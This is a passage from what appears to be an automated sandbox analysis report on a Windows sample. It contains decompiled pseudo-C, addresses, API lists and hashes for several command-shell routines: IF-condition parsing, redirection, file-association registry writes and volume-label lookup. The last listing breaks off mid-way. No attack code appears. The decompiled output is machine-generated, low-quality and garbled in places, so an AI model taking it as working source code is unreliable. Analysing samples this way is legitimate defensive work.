                                              • Associated: 00000004.00000002.677094920.00000000002ED000.00000040.00000001.sdmp Download File
                                              Similarity
                                              • API ID: FileLockShared$AcquirePointerReadRelease$ByteCharMultiWidememcmp
                                              • String ID:
                                              • API String ID: 2002953238-0
                                              • Opcode ID: 0282a15c79a4f87bff59fc6508828a0b8eda7a250b4c234223185841ec220f97
                                              • Instruction ID: e998b58317205635a9749643a44dce10befd18d13b632fd6de27f48bc0f6739a
                                              • Opcode Fuzzy Hash: 0282a15c79a4f87bff59fc6508828a0b8eda7a250b4c234223185841ec220f97
                                              • Instruction Fuzzy Hash: F751D272A64245AFDB20CF58DC88FA9BBB9EB45310F14861EF944DB291C6B18E60CB50
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 002ACDA2, Relevance: 15.1, APIs: 5, Strings: 5, Instructions: 97COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 32%
                                              			E002ACDA2(void* __ecx) {
				void* __ebp;
				void* _t2;
				signed int _t4;
				intOrPtr _t6;
				void* _t18;
				void* _t23;
				void* _t33;
				intOrPtr* _t36;

				_push(__ecx);
				_t33 = __ecx;
				_t2 = E002AF030(0);
				_t40 = _t2 - 0x4000;
				if(_t2 != 0x4000) {
					E002C82EB(0);
				}
				_t4 = E002AE9A0(0, _t40);
				_t36 = _t4;
				__imp___wcsicmp(L"ERRORLEVEL", 0x2dfaa0);
				_pop(_t18);
				if(_t4 == 0) {
					 *_t36 = 0x35;
					goto L14;
				} else {
					__imp___wcsicmp(L"EXIST", 0x2dfaa0);
					_pop(_t18);
					if(_t4 == 0) {
						 *_t36 = 0x37;
						L14:
						_t6 = E002AEA40(E002ADDCD(_t18, _t18, 0), 0);
						L12:
						 *((intOrPtr*)(_t36 + 0x3c)) = _t6;
						L9:
						return _t36;
					}
					if( *0x2e3cc9 == 0) {
						L7:
						__imp___wcsicmp(L"NOT", 0x2dfaa0);
						_pop(_t23);
						if(_t4 == 0) {
							__eflags = _t33;
							if(_t33 != 0) {
								E002C82EB(_t23);
							}
							 *_t36 = 0x38;
							__eflags = 1;
							_t6 = E002ACDA2(1);
							goto L12;
						}
						E002AF300(_t4, 0, 0, 0);
						 *_t36 = 0x39;
						E002A9520(_t36);
						goto L9;
					}
					__imp___wcsicmp(L"CMDEXTVERSION", 0x2dfaa0);
					_pop(_t18);
					if(_t4 == 0) {
						 *_t36 = 0x34;
						goto L14;
					}
					if( *0x2e3cc9 == 0) {
						goto L7;
					}
					__imp___wcsicmp(L"DEFINED", 0x2dfaa0);
					_pop(_t18);
					if(_t4 == 0) {
						 *_t36 = 0x36;
						goto L14;
					}
					goto L7;
				}
			}











                                              0x002acdaa
                                              0x002acdae
                                              0x002acdb2
                                              0x002acdb7
                                              0x002acdbc
                                              0x002bb3f9
                                              0x002bb3f9
                                              0x002acdc4
                                              0x002acdce
                                              0x002acdd6
                                              0x002acddd
                                              0x002acde0
                                              0x002bb403
                                              0x00000000
                                              0x002acde6
                                              0x002acdec
                                              0x002acdf3
                                              0x002acdf6
                                              0x002ace9a
                                              0x002ace86
                                              0x002ace93
                                              0x002ace7b
                                              0x002ace7b
                                              0x002ace60
                                              0x002ace68
                                              0x002ace68
                                              0x002ace03
                                              0x002ace36
                                              0x002ace3c
                                              0x002ace43
                                              0x002ace46
                                              0x002ace69
                                              0x002ace6b
                                              0x002acea2
                                              0x002acea2
                                              0x002ace6f
                                              0x002ace75
                                              0x002ace76
                                              0x00000000
                                              0x002ace76
                                              0x002ace4e
                                              0x002ace55
                                              0x002ace5b
                                              0x00000000
                                              0x002ace5b
                                              0x002ace0b
                                              0x002ace12
                                              0x002ace15
                                              0x002bb40e
                                              0x00000000
                                              0x002bb40e
                                              0x002ace22
                                              0x00000000
                                              0x00000000
                                              0x002ace2a
                                              0x002ace31
                                              0x002ace34
                                              0x002ace80
                                              0x00000000
                                              0x002ace80
                                              0x00000000
                                              0x002ace34

                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.676959985.00000000002A0000.00000040.00000001.sdmp, Offset: 002A0000, based on PE: true
                                              • Associated: 00000004.00000002.677078168.00000000002E9000.00000040.00000001.sdmp Download File
                                              • Associated: 00000004.00000002.677094920.00000000002ED000.00000040.00000001.sdmp Download File
                                              Similarity
                                              • API ID: _wcsicmp
                                              • String ID: CMDEXTVERSION$DEFINED$ERRORLEVEL$EXIST$NOT
                                              • API String ID: 2081463915-1668778490
                                              • Opcode ID: cba20d7df038319b3ced23c33635c2a4224873be1ff667f8acd8c62875d00428
                                              • Instruction ID: 3a7269123078553a369d80f656a12a2bd728e9d128511b0d0e2c47045eccc421
                                              • Opcode Fuzzy Hash: cba20d7df038319b3ced23c33635c2a4224873be1ff667f8acd8c62875d00428
                                              • Instruction Fuzzy Hash: 9321F3726786029BEB282F35A91A72776C9DB433A0F30442FE442851C1EEB68C60C619
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 002AD97E, Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 268COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 69%
                                              			E002AD97E(signed int* __ecx, signed int __edx) {
				signed int _v8;
				long _v20;
				char _v24;
				int _v28;
				void _v548;
				signed int _v552;
				signed int* _v556;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t56;
				signed int* _t68;
				signed int _t75;
				signed int _t76;
				WCHAR* _t80;
				WCHAR* _t83;
				void* _t89;
				void* _t90;
				signed int _t92;
				void* _t93;
				WCHAR* _t95;
				WCHAR* _t103;
				WCHAR* _t110;
				void* _t116;
				signed int _t120;
				signed int _t123;
				void* _t128;
				signed int _t129;
				signed int _t130;
				void* _t133;
				signed int _t135;
				signed int _t136;
				signed int _t137;

				_t124 = __edx;
				_t56 =  *0x2cd0b4; // 0x40f69e4c
				_v8 = _t56 ^ _t137;
				_t134 = 0x104;
				_v552 = __edx;
				_t95 = 0;
				_v24 = 1;
				_v28 = 0;
				_t129 = __ecx;
				_v20 = 0x104;
				_v556 = __ecx;
				memset( &_v548, 0, 0x104);
				if(E002B0C70( &_v548, ((0 | _v24 == 0x00000000) - 0x00000001 & 0x00007ee3) + 0x104) < 0) {
					L33:
					_t95 = 1;
					L30:
					__imp__??_V@YAXPAX@Z();
					return E002B6FD0(_t95, _t95, _v8 ^ _t137, _t124, _t129, _t134, _v28);
				}
				_t135 =  *(_t129 + 0x34);
				if(_t135 == 0) {
					L11:
					_t134 = _v552;
					if(_t134 == 3) {
						_t68 =  *0x2e3cd4;
						_v556 = _t68;
						L14:
						_t129 =  *(_t129 + 0x34);
						if(_t129 == 0) {
							goto L30;
						}
						_t134 = _t134 | 0xffffffff;
						do {
							if( *(_t129 + 8) != _t95) {
								goto L29;
							}
							__imp___get_osfhandle( *_t129);
							if(_t68 == _t134) {
								L39:
								 *(_t129 + 8) = _t134;
								L22:
								_t103 =  *(_t129 + 4);
								if( *_t103 == 0x26) {
									_t103[2] = 0;
									_t124 =  *_t129;
									_t105 = (( *(_t129 + 4))[1] & 0x0000ffff) - 0x30;
									if(E002ADBFC((( *(_t129 + 4))[1] & 0x0000ffff) - 0x30,  *_t129) != _t134) {
										goto L29;
									}
									L52:
									E002AD937();
									_t134 = 0x2e3d00;
									E002B274C(0x2e3d00, 0x104, L"%d",  *_t129);
									E002AC5A2(_t105, 0x2344, 1, 0x2e3d00);
									goto L33;
								}
								_push(_t103);
								if( *((short*)(_t129 + 0x10)) == 0x3c) {
									_t124 = 0x8000;
									_t75 = E002AD120(_t103, 0x8000);
									_v552 = _t75;
									if(_t75 != _t134) {
										L26:
										if(_t75 !=  *_t129) {
											_t124 =  *_t129;
											_t76 = E002ADBFC(_t75,  *_t129);
											_t105 = _v552;
											_t136 = _t76;
											E002ADB92(_v552);
											if(_t136 == 0xffffffff) {
												goto L52;
											}
											_t75 =  *_t129;
											_t134 = _t136 | 0xffffffff;
										}
										if(_t75 == _t134) {
											L53:
											E002AD937();
											E002C985A( *0x2e3cf0);
											goto L33;
										}
										_v556[1] = _t75;
										goto L29;
									}
									_t80 = E002B3320(L"DPATH");
									if(_t80 == 0) {
										goto L53;
									}
									_t110 = _v28;
									if(_t110 == 0) {
										_t110 =  &_v548;
									}
									if(SearchPathW(_t80,  *(_t129 + 4), _t95, _v20, _t110, _t95) == 0) {
										goto L53;
									} else {
										_t103 = _v28;
										if(_t103 == 0) {
											_t103 =  &_v548;
										}
										_push(_t103);
										_t124 = 0x8000;
										L25:
										_t75 = E002AD120(_t103, _t124);
										_v552 = _t75;
										if(_t75 == _t134) {
											goto L53;
										}
										goto L26;
									}
								}
								asm("sbb edx, edx");
								_t124 = ( ~( *(_t129 + 0xc)) & 0xfffffe09) + 0x301;
								goto L25;
							}
							__imp___get_osfhandle( *_t129);
							if(_t68 == 0xfffffffe) {
								goto L39;
							}
							if(E002B0178(_t68) == 0) {
								_t82 = E002C9953(_t82,  *_t129);
								if(_t82 != 0) {
									goto L20;
								}
								__imp___get_osfhandle( *_t129, _t95, _t95, 1);
								_pop(_t114);
								if(_t82 != _t134) {
									goto L20;
								}
								_t134 = 0x2e3d00;
								E002B274C(0x2e3d00, 0x104, L"%d",  *_t129);
								_push(0x2e3d00);
								_push(1);
								_push(0x40002721);
								L51:
								E002AC5A2(_t114);
								 *(_t129 + 8) = _t95;
								E002AD937();
								goto L33;
							}
							L20:
							_t114 =  *_t129;
							_t83 = E002ADBCE(_t82,  *_t129);
							 *(_t129 + 8) = _t83;
							if(_t83 == _t134) {
								_t134 = 0x2e3d00;
								E002B274C(0x2e3d00, 0x104, L"%d",  *_t129);
								_push(0x2e3d00);
								_push(1);
								_push(0x2344);
								goto L51;
							}
							E002ADB92( *_t129);
							goto L22;
							L29:
							_t68 =  *(_t129 + 0x14);
							_t129 = _t68;
						} while (_t68 != 0);
						goto L30;
					}
					_t116 = 0x10;
					_t68 = E002B00B0(_t116);
					_v556 = _t68;
					if(_t68 == 0) {
						goto L33;
					}
					_t68[3] =  *0x2e3cd4;
					 *0x2e3cd4 = _t68;
					_t68[2] = _t129;
					 *_t68 = _t134;
					goto L14;
				} else {
					goto L2;
				}
				do {
					L2:
					_t118 =  *(_t135 + 4);
					_t130 =  *(_t135 + 4);
					_t128 = _t130 + 2;
					do {
						_t89 =  *_t130;
						_t130 = _t130 + 2;
					} while (_t89 != _t95);
					_t90 = E002B22C0(_t95, _t118);
					_t124 = (_t130 - _t128 >> 1) + 1;
					E002B1040( *(_t135 + 4), (_t130 - _t128 >> 1) + 1, _t90);
					if( *((intOrPtr*)(_t135 + 8)) != _t95) {
						goto L9;
					}
					_t124 =  *(_t135 + 4);
					_t120 = _t124;
					_t133 = _t120 + 2;
					do {
						_t93 =  *_t120;
						_t120 = _t120 + 2;
					} while (_t93 != _t95);
					_t123 = (_t120 - _t133 >> 1) - 1;
					if(_t123 > 1 &&  *((short*)(_t124 + _t123 * 2)) == 0x3a) {
						 *((short*)(_t124 + _t123 * 2)) = 0;
					}
					L9:
					_t92 =  *(_t135 + 0x14);
					_t135 = _t92;
				} while (_t92 != 0);
				_t129 = _v556;
				goto L11;
			}




































                                              0x002ad97e
                                              0x002ad989
                                              0x002ad990
                                              0x002ad996
                                              0x002ad99b
                                              0x002ad9a1
                                              0x002ad9a3
                                              0x002ad9ae
                                              0x002ad9b1
                                              0x002ad9b3
                                              0x002ad9b8
                                              0x002ad9be
                                              0x002ad9e4
                                              0x002adb8d
                                              0x002adb8f
                                              0x002adb50
                                              0x002adb53
                                              0x002adb6c
                                              0x002adb6c
                                              0x002ad9ea
                                              0x002ad9ef
                                              0x002ada55
                                              0x002ada55
                                              0x002ada5e
                                              0x002bba31
                                              0x002bba36
                                              0x002ada8d
                                              0x002ada8d
                                              0x002ada92
                                              0x00000000
                                              0x00000000
                                              0x002ada98
                                              0x002ada9b
                                              0x002ada9e
                                              0x00000000
                                              0x00000000
                                              0x002adaa6
                                              0x002adaaf
                                              0x002bba90
                                              0x002bba90
                                              0x002adaef
                                              0x002adaef
                                              0x002adaf6
                                              0x002adb6f
                                              0x002adb76
                                              0x002adb7c
                                              0x002adb86
                                              0x00000000
                                              0x00000000
                                              0x002bbb58
                                              0x002bbb58
                                              0x002bbb5f
                                              0x002bbb6f
                                              0x002bbb7c
                                              0x00000000
                                              0x002bbb81
                                              0x002adafd
                                              0x002adafe
                                              0x002bba98
                                              0x002bba9d
                                              0x002bbaa2
                                              0x002bbaaa
                                              0x002adb2a
                                              0x002adb2c
                                              0x002bbaff
                                              0x002bbb03
                                              0x002bbb08
                                              0x002bbb0e
                                              0x002bbb10
                                              0x002bbb18
                                              0x00000000
                                              0x00000000
                                              0x002bbb1a
                                              0x002bbb1c
                                              0x002bbb1c
                                              0x002adb34
                                              0x002bbb89
                                              0x002bbb89
                                              0x002bbb94
                                              0x00000000
                                              0x002bbb94
                                              0x002adb40
                                              0x00000000
                                              0x002adb40
                                              0x002bbab5
                                              0x002bbabc
                                              0x00000000
                                              0x00000000
                                              0x002bbac2
                                              0x002bbac7
                                              0x002bbac9
                                              0x002bbac9
                                              0x002bbae1
                                              0x00000000
                                              0x002bbae7
                                              0x002bbae7
                                              0x002bbaec
                                              0x002bbaee
                                              0x002bbaee
                                              0x002bbaf4
                                              0x002bbaf5
                                              0x002adb17
                                              0x002adb17
                                              0x002adb1c
                                              0x002adb24
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x002adb24
                                              0x002bbae1
                                              0x002adb09
                                              0x002adb11
                                              0x00000000
                                              0x002adb11
                                              0x002adab7
                                              0x002adac1
                                              0x00000000
                                              0x00000000
                                              0x002adad0
                                              0x002bba43
                                              0x002bba4a
                                              0x00000000
                                              0x00000000
                                              0x002bba56
                                              0x002bba5c
                                              0x002bba66
                                              0x00000000
                                              0x00000000
                                              0x002bba6e
                                              0x002bba7e
                                              0x002bba83
                                              0x002bba84
                                              0x002bba86
                                              0x002bbb43
                                              0x002bbb43
                                              0x002bbb4b
                                              0x002bbb4e
                                              0x00000000
                                              0x002bbb4e
                                              0x002adad6
                                              0x002adad6
                                              0x002adad8
                                              0x002adadd
                                              0x002adae2
                                              0x002bbb26
                                              0x002bbb36
                                              0x002bbb3b
                                              0x002bbb3c
                                              0x002bbb3e
                                              0x00000000
                                              0x002bbb3e
                                              0x002adaea
                                              0x00000000
                                              0x002adb43
                                              0x002adb43
                                              0x002adb46
                                              0x002adb48
                                              0x00000000
                                              0x002ada9b
                                              0x002ada66
                                              0x002ada67
                                              0x002ada6c
                                              0x002ada74
                                              0x00000000
                                              0x00000000
                                              0x002ada80
                                              0x002ada83
                                              0x002ada88
                                              0x002ada8b
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x002ad9f1
                                              0x002ad9f1
                                              0x002ad9f1
                                              0x002ad9f4
                                              0x002ad9f6
                                              0x002ad9f9
                                              0x002ad9f9
                                              0x002ad9fc
                                              0x002ad9ff
                                              0x002ada08
                                              0x002ada10
                                              0x002ada14
                                              0x002ada1c
                                              0x00000000
                                              0x00000000
                                              0x002ada1e
                                              0x002ada21
                                              0x002ada23
                                              0x002ada26
                                              0x002ada26
                                              0x002ada29
                                              0x002ada2c
                                              0x002ada35
                                              0x002ada39
                                              0x002bba28
                                              0x002bba28
                                              0x002ada46
                                              0x002ada46
                                              0x002ada49
                                              0x002ada4b
                                              0x002ada4f
                                              0x00000000

                                              APIs
                                              • memset.MSVCRT ref: 002AD9BE
                                                • Part of subcall function 002B0C70: ??_V@YAXPAX@Z.MSVCRT ref: 002B0CBA
                                                • Part of subcall function 002B0C70: memset.MSVCRT ref: 002B0CDD
                                              • _get_osfhandle.MSVCRT ref: 002ADAA6
                                              • _get_osfhandle.MSVCRT ref: 002ADAB7
                                              • ??_V@YAXPAX@Z.MSVCRT ref: 002ADB53
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.676959985.00000000002A0000.00000040.00000001.sdmp, Offset: 002A0000, based on PE: true
                                              • Associated: 00000004.00000002.677078168.00000000002E9000.00000040.00000001.sdmp Download File
                                              • Associated: 00000004.00000002.677094920.00000000002ED000.00000040.00000001.sdmp Download File
                                              Similarity
                                              • API ID: _get_osfhandlememset
                                              • String ID: DPATH
                                              • API String ID: 3784859044-2010427443
                                              • Opcode ID: cca1d09c552bd9a9d3c92ca0e198ebd0e05f6fd343c1fdf5b4f42cb5b30b27c4
                                              • Instruction ID: 68830fbc8f18cb79d892d20ed5c657bd4b4a0bc73d12379388cbffc68ca4c3c8
                                              • Opcode Fuzzy Hash: cca1d09c552bd9a9d3c92ca0e198ebd0e05f6fd343c1fdf5b4f42cb5b30b27c4
                                              • Instruction Fuzzy Hash: 29915830A20203AFCB24EF64DC89AAAB7A1FF45354B244559E81A97681DF70ED70CF90
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 002C59E6, Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 211registryCOMMON
                                              Download Yara Rule
                                              C-Code - Quality: 76%
                                              			E002C59E6(void* __ecx, signed int __edx, char* _a4) {
				signed int _v8;
				short _v528;
				signed int _v532;
				void* _v536;
				void* _v540;
				long _v544;
				int _v548;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t39;
				intOrPtr _t41;
				short* _t44;
				signed short* _t52;
				char _t55;
				signed short _t62;
				long _t67;
				signed short _t69;
				signed int _t71;
				short* _t73;
				signed int _t75;
				char* _t85;
				void* _t88;
				signed short _t90;
				char* _t93;
				intOrPtr* _t94;
				signed short* _t98;
				void* _t99;
				signed int _t100;

				_t39 =  *0x2cd0b4; // 0x40f69e4c
				_v8 = _t39 ^ _t100;
				_t75 = __edx;
				_v540 = __ecx;
				_t94 = __edx;
				_v532 = __edx;
				_t93 = _a4;
				_t90 = __edx + 2;
				do {
					_t41 =  *_t94;
					_t94 = _t94 + 2;
				} while (_t41 != 0);
				if((_t94 - _t90 >> 1) + 0x14 <= 0x104) {
					E002B1040( &_v528, 0x104, __edx);
					_t90 = 0x104;
					_t44 =  &_v528;
					while( *_t44 != 0) {
						_t44 = _t44 + 2;
						_t90 = _t90 - 1;
						if(_t90 != 0) {
							continue;
						}
						break;
					}
					asm("sbb ecx, ecx");
					_t82 =  ~_t90 & 0x00000104 - _t90;
					if(_t90 != 0) {
						_t73 =  &(( &_v528)[_t82]);
						_t99 = 0x104 - _t82;
						if(_t99 == 0) {
							L15:
							_t73 = _t73 - 2;
						} else {
							_t88 = 0x7ffffffe;
							_t90 = L"\\Shell\\Open\\Command" - _t73;
							while(_t88 != 0) {
								_t75 = _v532;
								if(( *(_t73 + _t90) & 0x0000ffff) == 0) {
									break;
								} else {
									_t88 = _t88 - 1;
									 *_t73 =  *(_t73 + _t90) & 0x0000ffff;
									_t73 =  &(_t73[1]);
									_t75 = _v532;
									_t99 = _t99 - 1;
									if(_t99 != 0) {
										continue;
									} else {
										goto L15;
									}
								}
								goto L16;
							}
							if(_t99 == 0) {
								goto L15;
							}
						}
						L16:
						_t82 = 0;
						 *_t73 = 0;
					}
					_t98 = RegOpenKeyExW(_v540,  &_v528, 0, 0x2000000,  &_v536);
					if(_t98 == 0) {
						L30:
						if(_t93 == 0 ||  *_t93 == 0) {
							_t98 = RegDeleteValueW(_v536, 0);
							if(_t98 != 0) {
								E002AC5A2(_t82, 0x400023a5, 1, _t75);
								goto L39;
							}
						} else {
							_t85 = _t93;
							_t90 =  &(_t85[2]);
							do {
								_t55 =  *_t85;
								_t85 =  &(_t85[2]);
							} while (_t55 != 0);
							_t87 = _t85 - _t90 >> 1;
							_t98 = RegSetValueExW(_v536, 0x2a24ac, 0, 2, _t93, 2 + (_t85 - _t90 >> 1) * 2);
							if(_t98 != 0) {
								_push(0);
								_push(_t98);
								E002AC5A2(_t87);
								E002AC5A2(_t87, 0x235d, 1, _t75);
							} else {
								_push(_t93);
								_push(_t75);
								E002B25D9(L"%s=%s\r\n");
								L39:
							}
						}
						RegCloseKey(_v536);
						goto L41;
					} else {
						if(_t93 == 0 ||  *_t93 == 0) {
							E002AC5A2(_t82, 0x400023a5, 1, _t75);
							L41:
							_t52 = _t98;
						} else {
							_t98 =  &_v528;
							while(1) {
								_t62 =  *_t98 & 0x0000ffff;
								_t82 = _t62;
								_v532 = _t62;
								if(_t62 == 0) {
									goto L25;
								}
								_t90 = _t62;
								while(1) {
									_t82 = _t90 & 0x0000ffff;
									_v532 = _t90 & 0x0000ffff;
									if(_t90 == 0x5c) {
										goto L25;
									}
									_t71 = _t98[1] & 0x0000ffff;
									_t98 =  &(_t98[1]);
									_t82 = _t71;
									_t90 = _t71;
									_v532 = _t71;
									if(_t71 != 0) {
										continue;
									}
									goto L25;
								}
								L25:
								 *_t98 = 0;
								_t67 = RegCreateKeyExW(_v540,  &_v528, 0, 0, 0, 0x2000000, 0,  &_v536,  &_v548);
								_v544 = _t67;
								if(_t67 != 0) {
									E002AC5A2(_t82, 0x400023a5, 1, _t75);
									_t52 = _v544;
								} else {
									_t69 = _v532;
									if(_t69 == 0) {
										goto L30;
									} else {
										 *_t98 = _t69;
										_t98 =  &(_t98[1]);
										RegCloseKey(_v536);
										continue;
									}
								}
								goto L42;
							}
						}
					}
				} else {
					_push(0);
					_push(0x400023db);
					E002AC5A2(__ecx);
					_t52 = 1;
				}
				L42:
				return E002B6FD0(_t52, _t75, _v8 ^ _t100, _t90, _t93, _t98);
			}
































                                              0x002c59f1
                                              0x002c59f8
                                              0x002c59fc
                                              0x002c59fe
                                              0x002c5a05
                                              0x002c5a07
                                              0x002c5a0e
                                              0x002c5a11
                                              0x002c5a16
                                              0x002c5a16
                                              0x002c5a19
                                              0x002c5a1c
                                              0x002c5a2d
                                              0x002c5a56
                                              0x002c5a5b
                                              0x002c5a5d
                                              0x002c5a66
                                              0x002c5a6c
                                              0x002c5a6f
                                              0x002c5a72
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x002c5a72
                                              0x002c5a7c
                                              0x002c5a7e
                                              0x002c5a82
                                              0x002c5a8a
                                              0x002c5a8d
                                              0x002c5a8f
                                              0x002c5acc
                                              0x002c5acc
                                              0x002c5a91
                                              0x002c5a96
                                              0x002c5a9b
                                              0x002c5a9d
                                              0x002c5aa8
                                              0x002c5aae
                                              0x00000000
                                              0x002c5ab0
                                              0x002c5ab4
                                              0x002c5ab5
                                              0x002c5ab8
                                              0x002c5abb
                                              0x002c5ac1
                                              0x002c5ac4
                                              0x00000000
                                              0x002c5ac6
                                              0x00000000
                                              0x002c5ac6
                                              0x002c5ac4
                                              0x00000000
                                              0x002c5aae
                                              0x002c5aca
                                              0x00000000
                                              0x00000000
                                              0x002c5aca
                                              0x002c5acf
                                              0x002c5acf
                                              0x002c5ad1
                                              0x002c5ad1
                                              0x002c5af5
                                              0x002c5af9
                                              0x002c5bdd
                                              0x002c5bdf
                                              0x002c5c55
                                              0x002c5c59
                                              0x002c5c63
                                              0x00000000
                                              0x002c5c63
                                              0x002c5be7
                                              0x002c5be7
                                              0x002c5be9
                                              0x002c5bec
                                              0x002c5bec
                                              0x002c5bef
                                              0x002c5bf2
                                              0x002c5bf9
                                              0x002c5c19
                                              0x002c5c1d
                                              0x002c5c2d
                                              0x002c5c2f
                                              0x002c5c30
                                              0x002c5c3d
                                              0x002c5c1f
                                              0x002c5c1f
                                              0x002c5c20
                                              0x002c5c26
                                              0x002c5c68
                                              0x002c5c68
                                              0x002c5c1d
                                              0x002c5c71
                                              0x00000000
                                              0x002c5aff
                                              0x002c5b01
                                              0x002c5bd0
                                              0x002c5c77
                                              0x002c5c77
                                              0x002c5b11
                                              0x002c5b11
                                              0x002c5b17
                                              0x002c5b17
                                              0x002c5b1a
                                              0x002c5b1c
                                              0x002c5b25
                                              0x00000000
                                              0x00000000
                                              0x002c5b27
                                              0x002c5b29
                                              0x002c5b29
                                              0x002c5b2c
                                              0x002c5b36
                                              0x00000000
                                              0x00000000
                                              0x002c5b38
                                              0x002c5b3c
                                              0x002c5b3f
                                              0x002c5b41
                                              0x002c5b43
                                              0x002c5b4c
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x002c5b4c
                                              0x002c5b4e
                                              0x002c5b50
                                              0x002c5b7b
                                              0x002c5b81
                                              0x002c5b89
                                              0x002c5bb5
                                              0x002c5bba
                                              0x002c5b8b
                                              0x002c5b8b
                                              0x002c5b94
                                              0x00000000
                                              0x002c5b96
                                              0x002c5b9c
                                              0x002c5b9f
                                              0x002c5ba2
                                              0x00000000
                                              0x002c5ba2
                                              0x002c5b94
                                              0x00000000
                                              0x002c5b89
                                              0x002c5b17
                                              0x002c5b01
                                              0x002c5a2f
                                              0x002c5a2f
                                              0x002c5a31
                                              0x002c5a36
                                              0x002c5a3e
                                              0x002c5a3e
                                              0x002c5c79
                                              0x002c5c89

                                              APIs
                                              • RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,00000000,02000000,?), ref: 002C5AEF
                                              • RegCreateKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,00000000,00000000,00000000,02000000,00000000,?,?), ref: 002C5B7B
                                              • RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0(?), ref: 002C5BA2
                                              • RegSetValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,002A24AC,00000000,00000002,?,00000000), ref: 002C5C13
                                              • RegDeleteValueW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,00000000), ref: 002C5C4F
                                              • RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0(?), ref: 002C5C71
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.676959985.00000000002A0000.00000040.00000001.sdmp, Offset: 002A0000, based on PE: true
                                              • Associated: 00000004.00000002.677078168.00000000002E9000.00000040.00000001.sdmp Download File
                                              • Associated: 00000004.00000002.677094920.00000000002ED000.00000040.00000001.sdmp Download File
                                              Similarity
                                              • API ID: CloseValue$CreateDeleteOpen
                                              • String ID: %s=%s$\Shell\Open\Command
                                              • API String ID: 4081037667-3301834661
                                              • Opcode ID: 89144416127c633369044712e909a7a4e10cce0972c14e14ccb769d07ae8a191
                                              • Instruction ID: f90501e216ddd0e1347eb522655f0f4c95185de3b28c59ca8844005fbe03c1e6
                                              • Opcode Fuzzy Hash: 89144416127c633369044712e909a7a4e10cce0972c14e14ccb769d07ae8a191
                                              • Instruction Fuzzy Hash: 5771E971D6063A9BDB349F14CC89FA973B5EB54700F140299F909A7290EB71EEE48B50
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 002C6B30, Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 140COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 38%
                                              			E002C6B30(void* __ebx, signed short* _a4) {
				signed int _v8;
				char _v268;
				intOrPtr _v272;
				short _v276;
				short _v790;
				signed short _v802;
				long _v804;
				void* __edi;
				void* __esi;
				signed int _t20;
				short _t22;
				intOrPtr _t23;
				signed short _t24;
				void* _t29;
				signed short _t33;
				signed short _t34;
				long _t52;
				signed short* _t54;
				void* _t56;
				signed short* _t57;
				long _t60;
				void* _t66;
				long _t68;
				DWORD* _t70;
				signed short* _t71;
				void* _t72;
				signed short* _t74;
				void* _t75;
				signed int _t76;
				signed int _t78;
				signed int _t80;
				void* _t81;

				_t56 = __ebx;
				_t80 = (_t78 & 0xfffffff8) - 0x320;
				_t20 =  *0x2cd0b4; // 0x40f69e4c
				_v8 = _t20 ^ _t80;
				_t22 =  *L" :\\"; // 0x3a0020
				_t74 = _a4;
				_t70 = 0;
				_v276 = _t22;
				_t23 =  *0x2a3a8c; // 0x5c
				_t68 =  *_t74 & 0x0000ffff;
				_v272 = _t23;
				_v804 = 0;
				if(_t68 != 0) {
					_t57 = _t74;
					_t71 =  &(_t57[1]);
					do {
						_t24 =  *_t57;
						_t57 =  &(_t57[1]);
					} while (_t24 != _v804);
					if(_t57 - _t71 >> 1 != 2 || _t74[1] != 0x3a || iswalpha(_t68) == 0) {
						E002B25D9(L"\r\n");
						_pop(_t60);
						_push(0);
						_push(0xf);
						goto L19;
					} else {
						_t33 = towupper( *_t74 & 0x0000ffff);
						_t70 = 0;
						goto L10;
					}
				} else {
					_t54 =  *0x2e3cb8;
					if(_t54 == 0) {
						_t54 = 0x2e3ab0;
					}
					_t33 = towupper( *_t54 & 0x0000ffff);
					L10:
					_pop(_t66);
					_t34 = _t33 & 0x0000ffff;
					_t76 = _t34 & 0x0000ffff;
					_v276 = _t34;
					if(GetVolumeInformationW( &_v276,  &_v790, 0x101,  &_v804, _t70, _t70, _t70, _t70) != 0) {
						_push(_t76);
						_push(L"%c");
						_push(0x104);
						_push(0x2e3d00);
						if(_v790 == 0) {
							E002B274C();
							E002AC108(_t66, 0x235e, 1, 0x2e3d00);
							_t81 = _t80 + 0x1c;
						} else {
							E002B274C();
							_push( &_v790);
							E002AC108(_t66, 0x235f, 2, 0x2e3d00);
							_t81 = _t80 + 0x20;
						}
						_push(_v804 & 0x0000ffff);
						E002B274C( &_v268, 0x80, L"%04X-%04X", _v802 & 0x0000ffff);
						E002AC108(_t66, 0x235b, 1,  &_v268);
						_t80 = _t81 + 0x20;
						_t29 = 0;
					} else {
						E002B25D9(L"\r\n");
						_t52 = GetLastError();
						_t60 = 0x15;
						if(_t52 != _t60) {
							_t60 = GetLastError();
						}
						_push(_t70);
						_push(_t60);
						L19:
						E002AC5A2(_t60);
						_t29 = 1;
					}
				}
				_pop(_t72);
				_pop(_t75);
				return E002B6FD0(_t29, _t56, _v8 ^ _t80, _t68, _t72, _t75);
			}



































                                              0x002c6b30
                                              0x002c6b38
                                              0x002c6b3e
                                              0x002c6b45
                                              0x002c6b4c
                                              0x002c6b52
                                              0x002c6b56
                                              0x002c6b58
                                              0x002c6b5f
